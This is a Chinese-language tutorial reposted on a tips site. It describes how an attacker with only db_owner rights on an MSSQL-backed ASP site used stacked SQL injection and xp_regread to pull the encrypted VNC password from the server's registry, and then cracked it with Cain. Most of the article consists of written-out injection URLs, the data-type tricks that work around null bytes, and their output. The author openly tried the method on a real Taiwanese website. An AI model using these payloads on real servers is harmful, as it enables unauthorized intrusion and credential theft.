MSSQL db_owner角色注入直接获得系统权限

2016-01-29 16:36 77 1 收藏

MSSQL db_owner角色注入直接获得系统权限,MSSQL db_owner角色注入直接获得系统权限

【 tulaoshi.com - SQLServer 】

 

  相信大家对ASP+MSSQL注入都已经很熟悉了,连一个对SQL语法丝毫不懂的人也可以用NBSI来轻松入侵大量网站。但就算是一个SQL INJECTION高手,如果针对在MSSQL中只有db_owner角色,破不出猜不到网站后台的情况下,好像也无技可施;除了用备份得到shell的这个思路,我在网上实在没有找出更好的入侵办法。不过,备份得到的shell只是理论化的东东,如果一个webshell有20mb的话,你还能用它吗?前不久,我就碰到了这样的一个台湾网站,管理员的密码倒是用NBSi跑了出来,可是用户名因为是繁体的原因在NBSi中成了一堆乱码。我也找到了后台,可只有干瞪眼的份。怎么办?我又扫了它的所有端口,发现开了5900,估计是管理员用了VNC对服务器进行了远程控制。这时,我就有一个思路,能不能把VNC在注册表的加密密码读出来再来破解呢?看我表演吧!
  TELNET服务器的5900端口,得到讯息如图1所示,证实服务器的确用的是VNC。相信大家都会用读xp_regread来读注册表了,依次提交如下语句:
  http://www.something.com/script.asp?id=2;create table [dbo].[cyfd] ([gyfd][char](255));
这样我们就成功地建了一个名为cyfd的表,并且添加了类型是char,长度为255的字段名gyfd。然后向表中加数据:
_blankhttp://www.something.com/script.asp?id=2;DECLARE @result varchar(255) EXEC master.dbo.xp_regread HKEY_CURRENT_USER,SoftwareORLWinVNC3, Password, @result output insert into cyfd (gyfd) values(@result);--
从注册表中读出VNC在注册表的加密密码的值,再把值插入到刚建的表中。然后暴出VNC在注册表的加密密码:
_blankhttp://www.something.com/script.asp?id=2 and 1=(select count(*) from cyfd where gyfd 1)。
  可是结果大失我所望,gyfd的值是空的。如果这样容易的话,不会有这篇文章出现了。这是什么原因呢?我的语法不正确?翻来覆去的检查我的语句也没有发现错误呀。难道繁体的vnc在注册表里的位置不一样?后来我又开始在本机装了vnc又在分析查循器里做测试,得到的结果却是个数字5。这时czy上线了,询问了一下,他劝我把gyfd的这个字段改成二进制数据类型 binary来试一下。于是我又在本机测试了一下,依次提交如下语句:
   http://127.0.0.1/script.asp?id=2;create table [dbo].[cyfd] ([gyfd][binary](20));
http://127.0.0.1/script.asp?id=2;DECLARE @result binary(20) EXEC master.dbo.xp_regread HKEY_CURRENT_USER,SoftwareORLWinVNC3, Password, @result output insert into cyfd (gyfd) values(@result);--
然后我再用nbsi跑出cyfd表里gyfd这个字段的值。结果到是出来了,得到了vnc的加密密码值是0x0E3515AC00000000000000000000000000000000。可这儿还不对,我在本机装的vnc在注册表里的密码值是hex:0e,35,15,ac,00,62,d3,08这个呀。原来binary(n)的数据存储长度是固定的,当输入的二进制长度小于n时,余下长度填0补充。我在注入语句中写入的binary(20)是足够写入vnc加密密码的长度时,为什么还有那么多0来填充呢?这是因为正好我的vnc密码是0e3515ac0062d308,在碰到了00的情况下,xp_regread以为已经读完了它的值呢,把00当成了结束符,所以只读到了0x0E3515AC,我晕!
  翻了一下书,终于让我找到了一个特殊的数据类型uniqueidentifier,是用来存储一个16字节长的二进制数据类型。把注入语句改造一下:
   http://127.0.0.1/script.asp?id=2;create table [dbo].[cyfd] ([gyfd][uniqueidentifier]);
   http://127.0.0.1/script.asp?id=2;DECLARE @result uniqueidentifier EXEC master.dbo.xp_regread HKEY_CURRENT_USER,SoftwareORLWinVNC3, Password, @result output insert into cyfd (gyfd) values(@result);--
然后再用nbsi跑一下,跑出来了,不过得到的结果是AC15350E-6200-08D3-0000-000000000000。
  AC15350E-6200-08D3-0000-000000000000和我在注册表里的正确的vnc密码的值0e3515ac0062d308相比,能看出来有什么不同吗?只不过顺序是颠倒的,相信大家都会小学的算术,这个不用我教了。试一下用cain破出vnc的密码,看看行不行

(本文来源于图老师网站,更多请访问http://www.tulaoshi.com/sqlserver/)

  看样子在本机做的测试一切成功。这方法用到台湾上的站点试试,哎,依然没有跑出vnc的密码,也许繁体vnc在注册表的位置不同吧。不过,我研究了一上午,有了一点收获,就放过你吧。

(本文来源于图老师网站,更多请访问http://www.tulaoshi.com/sqlserver/) 

来源:http://www.tulaoshi.com/n/20160129/1499061.html

延伸阅读
标签: 电脑入门
现在Windows 7中有很多操作都需要超级管理员才能运行,应该如何获得Windows 7超级管理管理员权限呢?只要激活超级管理员Administrator账户。下面给大家分享下获得Windows 7超级管理员权限最简单的办法。 具体操作如下: 1、打开控制面板,在系统和安全-管理工具目录下找到并打开计算机管理。 2、在计算机管理窗口左侧展开本地用户和组目录,...
标签: 电脑入门
用win8的朋友再打开一些系统权限的时候,总是会遇到没权限访问的情况,或者在删除一些文件的时候,也会因为权限不足,而导致无法操作,那到底该怎么获得win8的最高权限呢?图老师小编给你来支两招 win8用户怎么获得最高权限 第一招 我们回到经典桌面,右击计算机---管理---本地用户和组---用户,这时候我们就能看见Administrator的身影了...
MySQL权限系统保证所有的用户可以严格地做他们假定被允许做的事情。当你连接一个MySQL服务器时, 你的身份由你从那连接的主机和你指定的用户名来决定,系统根据你的身份和你想做什么来授予权限。 MySQL在认定身份中考虑你的主机名和用户名字,是因为有很小的原因假定一个给定的用户在因特网上属于同一个人。例如,用户从whitehouse.gov连接的...
IBOS为什么角色和权限配好了,用户仍然没有使用权限?   角色加好了,角色权限也确认已经配好,用户仍然没有使用权限的情况下,需要检查用户在添加时是否有选择指定了角色(详见本章1.9.2)。因为在IBOS系统引导的过程中,快速添加账号时,账号的角色有默认值(总经理),该用户可能不是你希望的角色而当时没有留意的话,可能导致角色错误...
标签: 电脑入门
有时为了更好的操作MAC系统,我们需要修改一些系统文件,但是在修改这些系统文件的时候,往往需要管理员权限,而普通用户并没有这个权限,或者是不知道如何开启这个权限。在这种情况下,MAC系统文件该如何修改,或者说是如何才能修改MAC系统文件权限呢? 当我们要去修改一个包含成千上万个文件的文件夹权限时,问题来了,逐个文件修改权限是很...

经验教程

512

收藏

83
微博分享 QQ分享 QQ空间 手机页面 收藏网站 回到头部